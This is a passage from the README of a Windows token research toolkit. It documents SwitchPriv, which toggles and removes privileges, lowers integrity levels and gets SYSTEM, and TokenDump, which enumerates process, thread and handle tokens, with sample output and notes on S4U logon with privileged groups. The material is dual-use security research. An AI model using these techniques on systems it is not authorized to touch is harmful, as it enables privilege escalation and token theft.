INFORMATION\n-----------------\n\nGroup Name Type SID Attributes \n====================================== ================ ============================================= ==================================================\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group\nBUILTIN\\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group\nNT AUTHORITY\\NETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group\nCONTOSO\\ServerAdmins Group S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group\nService asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group\nMandatory Label\\System Mandatory Level Label S-1-16-16384\n```\n\n\u003e __WARNING__\n\u003e\n\u003e If you try S4U logon with unprivileged account for target machine, you will get error `0xC0000142` (`STATUS_DLL_INIT_FAILED`) and command cannot be executed.\n\u003e To avoid this problem, add privileged groups as extra groups with `-e` option.\n\u003e \n\u003e Additionaly, some account cannot be specified as extra group (e.g. `NT SERVICE\\TrustedInstaller`) for S4U logon.\n\u003e If you set such group accounts as extra group, S4U logon will be failed with error `0x00000005` (`ERROR_ACCESS_DENIED`)\n\n\n## SwitchPriv\n\n[Back to Top](#privfu)\n\n[Project](./SwitchPriv)\n\nThis tool is to enable or disable specific token privileges for a process:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -h\n\nSwitchPriv - Tool to control token privileges.\n\nUsage: SwitchPriv.exe [Options]\n\n -h, --help : Displays this help message.\n -d, --disable : Specifies token privilege to disable or \"all\".\n -e, --enable : Specifies token privilege to enable or \"all\".\n -f, --filter : Specifies token privilege you want to remain.\n -i, --integrity : Specifies integrity level to set in decimal value.\n -p, --pid : Specifies the target PID. Default specifies PPID.\n -r, --remove : Specifies token privilege to remove or \"all\".\n -s, --search : Specifies token privilege to search.\n -g, --get : Flag to get available privileges for the target process.\n -l, --list : Flag to list values for --integrity options.\n -S, --system : Flag to run as \"NT AUTHORITY\\SYSTEM\".\n```\n\nTo list values for `--integrity` option, execute with `--list` flag as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -l\n\nAvailable values for --integrity option:\n\n * 0 : UNTRUSTED_MANDATORY_LEVEL\n * 1 : LOW_MANDATORY_LEVEL\n * 2 : MEDIUM_MANDATORY_LEVEL\n * 3 : MEDIUM_PLUS_MANDATORY_LEVEL\n * 4 : HIGH_MANDATORY_LEVEL\n * 5 : SYSTEM_MANDATORY_LEVEL\n * 6 : PROTECTED_MANDATORY_LEVEL\n * 7 : SECURE_MANDATORY_LEVEL\n\nExample :\n\n * Down a specific process' integrity level to Low.\n\n PS C:\\\u003e .\\SwitchPriv.exe -p 4142 -s 1\n\nProtected and Secure level should not be available, but left for research purpose.\n```\n\nThe target process' PID is specified with `-p` option.\nYou can list available privileges for the target process with `-g` flag and `-p` option as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= =========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nWhen `-p` option is not specified, PID will be parent PID for this tool:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 6772\n [*] Process Name : powershell\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= =========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nPrivilege name to control is specfied with any case insensitive strings which can specify a unique privilege name in available privileges for the target process.\nFor example, to enable `SeUndockPrivilege` for the target process, execute with `--enable` option as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= =========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Disabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -e und\n\n[\u003e] Trying to enable a token privilege.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] SeUndockPrivilege is enabled successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= =========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nWhen you set bogus string which can not specify a unique privilege name, you will get following message:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -e se\n\n[\u003e] Trying to enable a token privilege.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[-] Cannot specify a unique privilege to enable.\n [*] SeShutdownPrivilege\n [*] SeChangeNotifyPrivilege\n [*] SeUndockPrivilege\n [*] SeIncreaseWorkingSetPrivilege\n [*] SeTimeZonePrivilege\n[*] Done.\n```\n\nFor example, to enable SeChangeNotifyPrivilege, execute with `--disable` option as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= =========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -d chan\n\n[\u003e] Trying to disable a token privilege.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] SeChangeNotifyPrivilege is disabled successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= ==========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Disabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nTo remove privilege, use `--remove` option as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= ==========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Disabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -r inc\n\n[\u003e] Trying to remove a token privilege.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] SeIncreaseWorkingSetPrivilege is removed successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 9408 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 9408\n [*] Process Name : Notepad\n[+] Got 4 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n======================= ==========================\nSeShutdownPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Disabled\nSeUndockPrivilege Enabled\nSeTimeZonePrivilege Disabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nIf you want to test a specific privilege, you can remove all privileges other than you want to test with `-f` option as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 4392\n [*] Process Name : powershell\n[+] Got 5 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n============================= =========================\nSeShutdownPrivilege Enabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Enabled\nSeIncreaseWorkingSetPrivilege Enabled\nSeTimeZonePrivilege Enabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -f tim\n\n[\u003e] Trying to remove all token privileges except one.\n [*] Target PID : 4392\n [*] Process Name : powershell\n[\u003e] Trying to remove all privileges except for SeTimeZonePrivilege.\n[+] SeShutdownPrivilege is removed successfully.\n[+] SeChangeNotifyPrivilege is removed successfully.\n[+] SeUndockPrivilege is removed successfully.\n[+] SeIncreaseWorkingSetPrivilege is removed successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 4392\n [*] Process Name : powershell\n[+] Got 1 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n=================== =======\nSeTimeZonePrivilege Enabled\n\n[*] Integrity Level : Medium Mandatory Level\n[*] Done.\n```\n\nYou can use comma separated value to filter multiple privileges as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 24300 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 24300\n [*] Process Name : powershell\n[+] Got 24 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n========================================= =========================\nSeIncreaseQuotaPrivilege Disabled\nSeSecurityPrivilege Disabled\nSeTakeOwnershipPrivilege Disabled\nSeLoadDriverPrivilege Disabled\nSeSystemProfilePrivilege Disabled\nSeSystemtimePrivilege Disabled\nSeProfileSingleProcessPrivilege Disabled\nSeIncreaseBasePriorityPrivilege Disabled\nSeCreatePagefilePrivilege Disabled\nSeBackupPrivilege Disabled\nSeRestorePrivilege Disabled\nSeShutdownPrivilege Disabled\nSeDebugPrivilege Enabled\nSeSystemEnvironmentPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeRemoteShutdownPrivilege Disabled\nSeUndockPrivilege Disabled\nSeManageVolumePrivilege Disabled\nSeImpersonatePrivilege EnabledByDefault, Enabled\nSeCreateGlobalPrivilege EnabledByDefault, Enabled\nSeIncreaseWorkingSetPrivilege Disabled\nSeTimeZonePrivilege Disabled\nSeCreateSymbolicLinkPrivilege Disabled\nSeDelegateSessionUserImpersonatePrivilege Disabled\n\n[*] Integrity Level : High Mandatory Level\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 24300 -f rest,back,deb\n\n[\u003e] Trying to remove all token privileges except one.\n [*] Target PID : 24300\n [*] Process Name : powershell\n[\u003e] Trying to remove privileges other than follows.\n [*] SeBackupPrivilege\n [*] SeRestorePrivilege\n [*] SeDebugPrivilege\n[+] SeIncreaseQuotaPrivilege is removed successfully.\n[+] SeSecurityPrivilege is removed successfully.\n[+] SeTakeOwnershipPrivilege is removed successfully.\n[+] SeLoadDriverPrivilege is removed successfully.\n[+] SeSystemProfilePrivilege is removed successfully.\n[+] SeSystemtimePrivilege is removed successfully.\n[+] SeProfileSingleProcessPrivilege is removed successfully.\n[+] SeIncreaseBasePriorityPrivilege is removed successfully.\n[+] SeCreatePagefilePrivilege is removed successfully.\n[+] SeShutdownPrivilege is removed successfully.\n[+] SeSystemEnvironmentPrivilege is removed successfully.\n[+] SeChangeNotifyPrivilege is removed successfully.\n[+] SeRemoteShutdownPrivilege is removed successfully.\n[+] SeUndockPrivilege is removed successfully.\n[+] SeManageVolumePrivilege is removed successfully.\n[+] SeImpersonatePrivilege is removed successfully.\n[+] SeCreateGlobalPrivilege is removed successfully.\n[+] SeIncreaseWorkingSetPrivilege is removed successfully.\n[+] SeTimeZonePrivilege is removed successfully.\n[+] SeCreateSymbolicLinkPrivilege is removed successfully.\n[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.\n[*] Done.\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -p 24300 -g\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 24300\n [*] Process Name : powershell\n[+] Got 3 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n========================= ========\nSeBackupPrivilege Disabled\nSeRestorePrivilege Disabled\nSeDebugPrivilege Enabled\n\n[*] Integrity Level : High Mandatory Level\n[*] Done.\n```\n\nTo enable, disable or remove all available token privileges, specify `all` as the value for `--enable`, `--disable` or `--remove` option:\n\n```\nPS C:\\Dev\u003e whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State\n============================= ==================================== ========\nSeShutdownPrivilege Shut down the system Disabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\nSeTimeZonePrivilege Change the time zone Disabled\nPS C:\\Dev\u003e .\\SwitchPriv.exe -e all\n\n[\u003e] Trying to enable all token privileges.\n [*] Target PID : 6772\n [*] Process Name : powershell\n[+] SeShutdownPrivilege is enabled successfully.\n[+] SeUndockPrivilege is enabled successfully.\n[+] SeIncreaseWorkingSetPrivilege is enabled successfully.\n[+] SeTimeZonePrivilege is enabled successfully.\n[*] Done.\n\nPS C:\\Dev\u003e whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State\n============================= ==================================== =======\nSeShutdownPrivilege Shut down the system Enabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Enabled\nSeTimeZonePrivilege Change the time zone Enabled\n```\n\nTo find process have a specific privilege, use `-s` option as follows:\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -s createt\n\n[\u003e] Searching processes have SeCreateTokenPrivilege.\n[+] Got 5 process(es).\n [*] Memory Compression (PID : 2548)\n [*] smss (PID : 372)\n [*] lsass (PID : 736)\n [*] csrss (PID : 584)\n [*] csrss (PID : 504)\n[*] Access is denied by following 2 process(es).\n [*] System (PID : 4)\n [*] Idle (PID : 0)\n[*] Done.\n\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g -p 2548\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 2548\n [*] Process Name : Memory Compression\n[+] Got 31 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n========================================= =========================\nSeCreateTokenPrivilege Disabled\nSeAssignPrimaryTokenPrivilege Disabled\nSeLockMemoryPrivilege EnabledByDefault, Enabled\nSeIncreaseQuotaPrivilege Disabled\nSeTcbPrivilege EnabledByDefault, Enabled\nSeSecurityPrivilege Disabled\nSeTakeOwnershipPrivilege Disabled\nSeLoadDriverPrivilege Disabled\nSeSystemProfilePrivilege EnabledByDefault, Enabled\nSeSystemtimePrivilege Disabled\nSeProfileSingleProcessPrivilege EnabledByDefault, Enabled\nSeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled\nSeCreatePagefilePrivilege EnabledByDefault, Enabled\nSeCreatePermanentPrivilege EnabledByDefault, Enabled\nSeBackupPrivilege Disabled\nSeRestorePrivilege Disabled\nSeShutdownPrivilege Disabled\nSeDebugPrivilege EnabledByDefault, Enabled\nSeAuditPrivilege EnabledByDefault, Enabled\nSeSystemEnvironmentPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Disabled\nSeManageVolumePrivilege Disabled\nSeImpersonatePrivilege EnabledByDefault, Enabled\nSeCreateGlobalPrivilege EnabledByDefault, Enabled\nSeTrustedCredManAccessPrivilege Disabled\nSeRelabelPrivilege Disabled\nSeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled\nSeTimeZonePrivilege EnabledByDefault, Enabled\nSeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled\nSeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled\n\n[*] Integrity Level : System Mandatory Level\n[*] Done.\n```\n\nIf you want to set integrity level, use `--integrity` option as follows:\n\n```\nPS C:\\Dev\u003e whoami /groups | findstr /i level\nMandatory Label\\Medium Mandatory Level Label S-1-16-8192\n\nPS C:\\Dev\u003e .\\SwitchPriv.exe -i 1\n\n[\u003e] Trying to update Integrity Level.\n [*] Target PID : 3436\n [*] Process Name : powershell\n[\u003e] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.\n[+] Integrity Level is updated successfully.\n[*] Done.\n\nPS C:\\Dev\u003e whoami /groups | findstr /i level\nMandatory Label\\Low Mandatory Level Label S-1-16-4096\n```\n\nTo perform any actions as SYSTEM, set `-S` flag as follows (`SeDebugPrivilege` and `SeImpersonatePrivilege` are required):\n\n```\nPS C:\\Dev\u003e .\\SwitchPriv.exe -g -p 2548 -S\n\n[\u003e] Trying to get available token privilege(s) for the target process.\n [*] Target PID : 2548\n [*] Process Name : Memory Compression\n[\u003e] Trying to get SYSTEM.\n[+] Got SYSTEM privilege.\n[+] Got 31 token privilege(s).\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name State\n========================================= =========================\nSeCreateTokenPrivilege Disabled\nSeAssignPrimaryTokenPrivilege Disabled\nSeLockMemoryPrivilege EnabledByDefault, Enabled\nSeIncreaseQuotaPrivilege Disabled\nSeTcbPrivilege EnabledByDefault, Enabled\nSeSecurityPrivilege Disabled\nSeTakeOwnershipPrivilege Disabled\nSeLoadDriverPrivilege Disabled\nSeSystemProfilePrivilege EnabledByDefault, Enabled\nSeSystemtimePrivilege Disabled\nSeProfileSingleProcessPrivilege EnabledByDefault, Enabled\nSeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled\nSeCreatePagefilePrivilege EnabledByDefault, Enabled\nSeCreatePermanentPrivilege EnabledByDefault, Enabled\nSeBackupPrivilege Disabled\nSeRestorePrivilege Disabled\nSeShutdownPrivilege Disabled\nSeDebugPrivilege EnabledByDefault, Enabled\nSeAuditPrivilege EnabledByDefault, Enabled\nSeSystemEnvironmentPrivilege Disabled\nSeChangeNotifyPrivilege EnabledByDefault, Enabled\nSeUndockPrivilege Disabled\nSeManageVolumePrivilege Disabled\nSeImpersonatePrivilege EnabledByDefault, Enabled\nSeCreateGlobalPrivilege EnabledByDefault, Enabled\nSeTrustedCredManAccessPrivilege Disabled\nSeRelabelPrivilege Disabled\nSeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled\nSeTimeZonePrivilege EnabledByDefault, Enabled\nSeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled\nSeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled\n\n[*] Integrity Level : System Mandatory Level\n[*] Done.\n```\n\n\n## TokenDump\n\n[Back to Top](#privfu)\n\n[Project](./TokenDump)\n\n\nThis tool is a utility to inspect token information:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -h\n\nTokenDump - Tool to dump processs token information.\n\nUsage: TokenDump.exe [Options]\n\n -h, --help : Displays this help message.\n -d, --debug : Flag to enable SeDebugPrivilege.\n -e, --enum : Flag to enumerate brief information tokens for processes or handles.\n -T, --thread : Flag to scan thead tokens. Use with -e option.\n -H, --handle : Flag to scan token handles. Use with -e option.\n -s, --scan : Flag to get verbose information for a specific process, thread or handle.\n -a, --account : Specifies account name filter string. Use with -e flag.\n -p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.\n -t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.\n -v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.\n```\n\nTo enumerate token for all processes, just set `-e` flag:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e\n\n[\u003e] Trying to enumerate process token.\n\n PID Session Process Name Token User Integrity Restricted AppContainer\n==== ======= =========================== ============================ ========= ========== ============\n5004 0 svchost.exe NT AUTHORITY\\SYSTEM System False False\n3728 0 conhost.exe NT AUTHORITY\\SYSTEM System False False\n\n--snip--\n\n6712 0 svchost.exe NT AUTHORITY\\LOCAL SERVICE System False False\n1972 0 svchost.exe NT AUTHORITY\\SYSTEM System False False\n\n[+] Got 129 token information.\n[*] Found 7 account(s).\n [*] NT AUTHORITY\\SYSTEM\n [*] dev22h2\\user\n [*] NT AUTHORITY\\LOCAL SERVICE\n [*] NT AUTHORITY\\NETWORK SERVICE\n [*] Font Driver Host\\UMFD-0\n [*] Font Driver Host\\UMFD-1\n [*] Window Manager\\DWM-1\n[*] Done.\n```\n\nIf you want to enable SeDebugPrivilege, set `-d` flag as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate process token.\n\n PID Session Process Name Token User Integrity Restricted AppContainer\n==== ======= =========================== ============================ ========= ========== ============\n5004 0 svchost.exe NT AUTHORITY\\SYSTEM System False False\n3728 0 conhost.exe NT AUTHORITY\\SYSTEM System False False\n3740 0 vm3dservice.exe NT AUTHORITY\\SYSTEM System False False\n\n--snip--\n```\n\nWhen set `-H` flag with `-e` flag, TokenDump tries to enumerate Token handles information:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -H -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate token handles.\n\n[Token Handle(s) - winlogon.exe (PID: 704)]\n\nHandle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= =================== ========= ========== ============ ============= ===================\n 0x2B0 1 NT AUTHORITY\\SYSTEM System False False Primary Anonymous\n 0x2B4 1 NT AUTHORITY\\SYSTEM System False False Primary Anonymous\n 0x38C 1 dev22h2\\user Medium False False Primary Impersonation\n\n--snip--\n\n[Token Handle(s) - svchost.exe (PID: 3272)]\n\nHandle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= ========================== ========= ========== ============ ========== ===================\n 0x168 0 NT AUTHORITY\\LOCAL SERVICE System False False Primary Anonymous\n\n[+] Got 819 handle(s).\n[*] Found 8 account(s).\n [*] NT AUTHORITY\\SYSTEM\n [*] dev22h2\\user\n [*] Font Driver Host\\UMFD-1\n [*] Font Driver Host\\UMFD-0\n [*] NT AUTHORITY\\NETWORK SERVICE\n [*] Window Manager\\DWM-1\n [*] NT AUTHORITY\\LOCAL SERVICE\n [*] NT AUTHORITY\\ANONYMOUS LOGON\n[*] Done.\n```\n\nWhen specified PID with `-p` option, TokenDup enumerate only the specified process handles:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -H -d -p 704\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate token handles.\n\n[Token Handle(s) - winlogon.exe (PID: 704)]\n\nHandle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= =================== ========= ========== ============ ============= ===================\n 0x2B0 1 NT AUTHORITY\\SYSTEM System False False Primary Anonymous\n 0x2B4 1 NT AUTHORITY\\SYSTEM System False False Primary Anonymous\n 0x38C 1 dev22h2\\user Medium False False Primary Impersonation\n 0x398 1 dev22h2\\user High False False Primary Identification\n 0x3C4 1 dev22h2\\user Medium False False Impersonation Impersonation\n 0x3C8 1 dev22h2\\user Medium False False Impersonation Impersonation\n 0x3D0 1 dev22h2\\user Medium False False Impersonation Impersonation\n 0x3D4 1 dev22h2\\user Medium False False Impersonation Impersonation\n\n[+] Got 8 handle(s).\n[*] Found 2 account(s).\n [*] NT AUTHORITY\\SYSTEM\n [*] dev22h2\\user\n[*] Done.\n```\n\nTo enumerate impersonated thread token, set `-T` flag as well as `-e` flag as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -T -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate impersonated threads.\n\n PID TID Session Process Name Token User Integrity Impersonation Level\n==== ==== ======= ============ =================== ========= ===================\n1952 2000 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n1952 2300 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n3516 4348 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n3516 4656 0 svchost.exe NT AUTHORITY\\SYSTEM System Impersonation\n\n[+] Got 4 thread(s).\n[*] Found 1 account(s).\n [*] NT AUTHORITY\\SYSTEM\n[*] Done.\n```\n\nIf you want to filter these results with token username, set filter string as `-a` option value as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -a network -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate process token.\n\n PID Session Process Name Token User Integrity Restricted AppContainer\n==== ======= ============ ============================ ========= ========== ============\n1932 0 svchost.exe NT AUTHORITY\\NETWORK SERVICE System False False\n3500 0 svchost.exe NT AUTHORITY\\NETWORK SERVICE System False False\n2904 0 svchost.exe NT AUTHORITY\\NETWORK SERVICE System False False\n2504 0 svchost.exe NT AUTHORITY\\NETWORK SERVICE System False False\n7012 0 msdtc.exe NT AUTHORITY\\NETWORK SERVICE System False False\n7092 0 sppsvc.exe NT AUTHORITY\\NETWORK SERVICE System False False\n1676 0 svchost.exe NT AUTHORITY\\NETWORK SERVICE System False False\n3584 0 WmiPrvSE.exe NT AUTHORITY\\NETWORK SERVICE System False False\n1000 0 svchost.exe NT AUTHORITY\\NETWORK SERVICE System False False\n\n[+] Got 9 token information.\n[*] Found 7 account(s).\n [*] NT AUTHORITY\\SYSTEM\n [*] dev22h2\\user\n [*] NT AUTHORITY\\LOCAL SERVICE\n [*] NT AUTHORITY\\NETWORK SERVICE\n [*] Font Driver Host\\UMFD-0\n [*] Font Driver Host\\UMFD-1\n [*] Window Manager\\DWM-1\n[*] Done.\n\nC:\\Dev\u003e.\\TokenDump.exe -e -a network -d -H\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate token handles.\n\n[Token Handle(s) - lsass.exe (PID: 768)]\n\nHandle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= ============================ ========= ========== ============ ============= ===================\n 0x914 0 NT AUTHORITY\\NETWORK SERVICE System False False Impersonation Impersonation\n\n--snip--\n\n[Token Handle(s) - msdtc.exe (PID: 7012)]\n\nHandle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= ============================ ========= ========== ============ ========== ===================\n 0x23C 0 NT AUTHORITY\\NETWORK SERVICE System False False Primary Anonymous\n\n[+] Got 27 handle(s).\n[*] Found 8 account(s).\n [*] NT AUTHORITY\\SYSTEM\n [*] dev22h2\\user\n [*] Font Driver Host\\UMFD-1\n [*] Font Driver Host\\UMFD-0\n [*] NT AUTHORITY\\NETWORK SERVICE\n [*] Window Manager\\DWM-1\n [*] NT AUTHORITY\\LOCAL SERVICE\n [*] NT AUTHORITY\\ANONYMOUS LOGON\n[*] Done.\n```\n\nTo get verbose information for a specific process, set `-s` flag and target PID as `-p` option value:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -s -p 5996\n\n[\u003e] Trying to dump process token information.\n\n[Token Information for StartMenuExperienceHost.exe (PID: 5996)]\n\nImageFilePath : C:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\StartMenuExperienceHost.exe\nCommandLine : \"C:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\StartMenuExperienceHost.exe\" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca\nToken User : dev22h2\\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)\nToken Owner : dev22h2\\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)\nPrimary Group : dev22h2\\None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)\nToken Type : Primary\nImpersonation Level : Anonymous\nToken 